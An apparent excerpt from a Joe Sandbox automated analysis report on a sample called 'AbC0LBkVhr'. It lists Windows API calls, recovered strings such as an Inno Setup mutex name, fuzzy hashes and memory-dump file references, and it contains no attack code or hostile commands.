                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$Placement$Iconic
                                                          • String ID:
                                                          • API String ID: 568898626-0
                                                          • Opcode ID: 47b671fdedc35fdf98b71b51c82caa7697cc0af64fcddd8af6052c4a4d8e86ab
                                                          • Instruction ID: 3daf342c44424aa5ce1366acdd2a80e82e5cfeaf10da0033b5167ac39e8fb95c
                                                          • Opcode Fuzzy Hash: 47b671fdedc35fdf98b71b51c82caa7697cc0af64fcddd8af6052c4a4d8e86ab
                                                          • Instruction Fuzzy Hash: BE017C31204108ABDB10EE69ECC1EE773A8AF59324F154166FE09CF242D638EC8087A8
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CaptureIconic
                                                          • String ID:
                                                          • API String ID: 2277910766-0
                                                          • Opcode ID: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                          • Instruction ID: 3321041a09622c131d5de1c426c5b9ba37bf97161ea704a377034d17a7c99502
                                                          • Opcode Fuzzy Hash: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                          • Instruction Fuzzy Hash: 2EF0AF7230564157D7209B2EC984ABB62F69F88318B54483FE419CBB61EB78DCC08658
                                                          APIs
                                                          • IsIconic.USER32(?), ref: 00424193
                                                            • Part of subcall function 00423A7C: EnumWindows.USER32(00423A14), ref: 00423AA0
                                                            • Part of subcall function 00423A7C: GetWindow.USER32(?,00000003), ref: 00423AB5
                                                            • Part of subcall function 00423A7C: GetWindowLongA.USER32(?,000000EC), ref: 00423AC4
                                                            • Part of subcall function 00423A7C: SetWindowPos.USER32(00000000,TAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241A3,?,?,00423D6B), ref: 00423AFA
                                                          • SetActiveWindow.USER32(?,?,?,00423D6B,00000000,00424154), ref: 004241A7
                                                            • Part of subcall function 00423644: ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$ActiveEnumIconicLongShowWindows
                                                          • String ID:
                                                          • API String ID: 2671590913-0
                                                          • Opcode ID: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                          • Instruction ID: 714e4cd20337d44954868cb88e5cd3c5f05620b237e6b6751f152470bbecd415
                                                          • Opcode Fuzzy Hash: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                          • Instruction Fuzzy Hash: 47E01AA070011087EB10AF69DCC9B9632A8BB4C304F5501BABD49CF25BD63CC8608728
                                                          APIs
                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127CD), ref: 004127BB
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: NtdllProc_Window
                                                          • String ID:
                                                          • API String ID: 4255912815-0
                                                          • Opcode ID: fadc627793d3d758d03d3b6288103bd692d15878d139e3b8876b7a5e98d728c0
                                                          • Instruction ID: 515a926e27beec0aab385df702329c93692b8444378934293cf55fba5e442f36
                                                          • Opcode Fuzzy Hash: fadc627793d3d758d03d3b6288103bd692d15878d139e3b8876b7a5e98d728c0
                                                          • Instruction Fuzzy Hash: 4951F335304205CFD714DB6ADA8099BF3E5EF94314B2481ABD815C33A1D7B8ADA2CB48
                                                          APIs
                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004786A2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: NtdllProc_Window
                                                          • String ID:
                                                          • API String ID: 4255912815-0
                                                          • Opcode ID: 74fd435c634dc11c163aa08e5e8bd118cd21225c10192b8e8785eef0067adbbd
                                                          • Instruction ID: b7c0c70f2a783e09ad8744fe0b8a2eb923ce1fb3c3bfc7260a93e3bfca3db08f
                                                          • Opcode Fuzzy Hash: 74fd435c634dc11c163aa08e5e8bd118cd21225c10192b8e8785eef0067adbbd
                                                          • Instruction Fuzzy Hash: 1C416875604104EFCB10CF99C6888AAB7F5FB48311B24C99AE80CEB701DB38EE41DB95
                                                          APIs
                                                          • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045D067
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CryptFour
                                                          • String ID:
                                                          • API String ID: 2153018856-0
                                                          • Opcode ID: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                          • Instruction ID: 2e238a974be0c8424367b3c35ccc205e7f0a308c5ec670be841bb4718b7179ff
                                                          • Opcode Fuzzy Hash: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                          • Instruction Fuzzy Hash: 37C09BF200420CBF660057D5ECC9C77B75CF6586547508126F6048210195726C104574
                                                          APIs
                                                          • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046D934,?,0046DB15), ref: 0045D07A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CryptFour
                                                          • String ID:
                                                          • API String ID: 2153018856-0
                                                          • Opcode ID: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                          • Instruction ID: 227689971defb3a768f182aa15824e3680876923b4d994b81e1676941902ce31
                                                          • Opcode Fuzzy Hash: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                          • Instruction Fuzzy Hash: 9DA002B0A80300BAFD2057B05D4EF26352CA7D0F05F708465B202EA0D085A56410852C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2975560260.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000001.00000002.2975508515.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000001.00000002.2975590749.0000000010002000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_10000000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                          • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                          • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                          • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2975560260.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000001.00000002.2975508515.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000001.00000002.2975590749.0000000010002000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_10000000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                          • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                          • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                          • Instruction Fuzzy Hash:
                                                          APIs
                                                            • Part of subcall function 0044B5FC: GetVersionExA.KERNEL32(00000094), ref: 0044B619
                                                          • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F76D,004980FE), ref: 0044B677
                                                          • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B68F
                                                          • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A1
                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6B3
                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6C5
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6D7
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6E9
                                                          • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B6FB
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B70D
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B71F
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B731
                                                          • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B743
                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B755
                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B767
                                                          • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B779
                                                          • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B78B
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B79D
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7AF
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C1
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7D3
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7E5
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7F7
                                                          • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B809
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B81B
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B82D
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B83F
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B851
                                                          • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B863
                                                          • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B875
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B887
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B899
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8AB
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8BD
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8CF
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E1
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8F3
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B905
                                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B917
                                                          • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B929
                                                          • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B93B
                                                          • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B94D
                                                          • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B95F
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B971
                                                          • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B983
                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B995
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9A7
                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9B9
                                                          • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9CB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoadVersion
                                                          • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                          • API String ID: 1968650500-2910565190
                                                          • Opcode ID: 6c67b19e24951571b37bf4c203fa1685e3d140177509ee69aad76801aa2bc0fe
                                                          • Instruction ID: 77cdb2a24b144e98dd8fe0af3c477b00202e10f27d636664339925e4e96e780e
                                                          • Opcode Fuzzy Hash: 6c67b19e24951571b37bf4c203fa1685e3d140177509ee69aad76801aa2bc0fe
                                                          • Instruction Fuzzy Hash: 679198F0A40B11EBEB00AFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                          APIs
                                                          • 73A1A570.USER32(00000000,?,0041A93C,?), ref: 0041CA38
                                                          • 73A24C40.GDI32(?,00000000,?,0041A93C,?), ref: 0041CA44
                                                          • 73A26180.GDI32(0041A93C,?,00000001,00000001,00000000,00000000,0041CC5A,?,?,00000000,?,0041A93C,?), ref: 0041CA68
                                                          • 73A24C00.GDI32(?,0041A93C,?,00000000,0041CC5A,?,?,00000000,?,0041A93C,?), ref: 0041CA78
                                                          • SelectObject.GDI32(0041CE34,00000000), ref: 0041CA93
                                                          • FillRect.USER32(0041CE34,?,?), ref: 0041CACE
                                                          • SetTextColor.GDI32(0041CE34,00000000), ref: 0041CAE3
                                                          • SetBkColor.GDI32(0041CE34,00000000), ref: 0041CAFA
                                                          • PatBlt.GDI32(0041CE34,00000000,00000000,0041A93C,?,00FF0062), ref: 0041CB10
                                                          • 73A24C40.GDI32(?,00000000,0041CC13,?,0041CE34,00000000,?,0041A93C,?,00000000,0041CC5A,?,?,00000000,?,0041A93C), ref: 0041CB23
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041CB54
                                                          • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13,?,0041CE34,00000000,?,0041A93C), ref: 0041CB6C
                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13,?,0041CE34,00000000,?), ref: 0041CB75
                                                          • 73A18830.GDI32(0041CE34,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13), ref: 0041CB84
                                                          • 73A122A0.GDI32(0041CE34,0041CE34,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13), ref: 0041CB8D
                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041CBA6
                                                          • SetBkColor.GDI32(00000000,00000000), ref: 0041CBBD
                                                          • 73A24D40.GDI32(0041CE34,00000000,00000000,0041A93C,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC02,?,?,00000000), ref: 0041CBD9
                                                          • SelectObject.GDI32(00000000,?), ref: 0041CBE6
                                                          • DeleteDC.GDI32(00000000), ref: 0041CBFC
                                                            • Part of subcall function 0041A050: GetSysColor.USER32(?), ref: 0041A05A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Color$ObjectSelect$A122A18830Text$A26180A570DeleteFillRect
                                                          • String ID:
                                                          • API String ID: 1381628555-0
                                                          • Opcode ID: dd52d12a6b024fa5c35df86d1f57249e44ceff71b775bbbb3271d9076c63cc1d
                                                          • Instruction ID: 82b5d3b79294c4079cc38f46940f8a3e5246528c32e36f15c424f6ef30e38055
                                                          • Opcode Fuzzy Hash: dd52d12a6b024fa5c35df86d1f57249e44ceff71b775bbbb3271d9076c63cc1d
                                                          • Instruction Fuzzy Hash: 0061F071A44608AFDB10EBE5DC86FEFB7B8EB48704F10446AB504E7281D67CA9508B69
                                                          APIs
                                                          • ShowWindow.USER32(?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000,?,0049802B,00000000,00498035,?,00000000), ref: 0049795F
                                                          • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000,?,0049802B,00000000), ref: 00497972
                                                          • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000), ref: 00497982
                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004979A3
                                                          • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000), ref: 004979B3
                                                            • Part of subcall function 0042D444: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4D2,?,?,?,00000001,?,00456052,00000000,004560BA), ref: 0042D479
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                          • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                          • API String ID: 2000705611-3672972446
                                                          • Opcode ID: 2045753806e23fd6e9fea4bee8d30805ced8101e67e5ade90995f0c82b8a892a
                                                          • Instruction ID: f92775941c35c4987ffcee83f2591dcd2e8f64eb72217f5dcf8b9acaa4e0c6bb
                                                          • Opcode Fuzzy Hash: 2045753806e23fd6e9fea4bee8d30805ced8101e67e5ade90995f0c82b8a892a
                                                          • Instruction Fuzzy Hash: 3E91D7306182449FDF11EBA5C856BAE7BF4EB49308F5184B7F500A7392D67CAC05CB19
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,0045A7B4,?,?,?,?,?,00000006,?,00000000,00496D69,?,00000000,00496E0C), ref: 0045A666
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                          • API String ID: 1452528299-3112430753
                                                          • Opcode ID: 127c5c00bd7f07bd664bda2d415f16e76833b4e90778cf540cd654be4338eef0
                                                          • Instruction ID: 580fd2345af5d8a11a71580b87de25b1444814d8228b9e74f7717922954df390
                                                          • Opcode Fuzzy Hash: 127c5c00bd7f07bd664bda2d415f16e76833b4e90778cf540cd654be4338eef0
                                                          • Instruction Fuzzy Hash: E07181307002445BCB01EB6988817AE7BB59F48319F50866BFC01EB383DB7CDE59879A
                                                          APIs
                                                          • GetVersion.KERNEL32 ref: 0045C9FA
                                                          • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CA1A
                                                          • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CA27
                                                          • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CA34
                                                          • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CA42
                                                            • Part of subcall function 0045C8E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C987,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C961
                                                          • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CC35,?,?,00000000), ref: 0045CAFB
                                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CC35,?,?,00000000), ref: 0045CB04
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                          • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                          • API String ID: 59345061-4263478283
                                                          • Opcode ID: d4e9dcddc66f996bc70a3a05105cdd7da188d764776208506d3c6d6334ff02cf
                                                          • Instruction ID: 7cfcd68cf7d50f34506c8699d7ac6bd3cbd645d605ef7a14e0a5f99aee2185cc
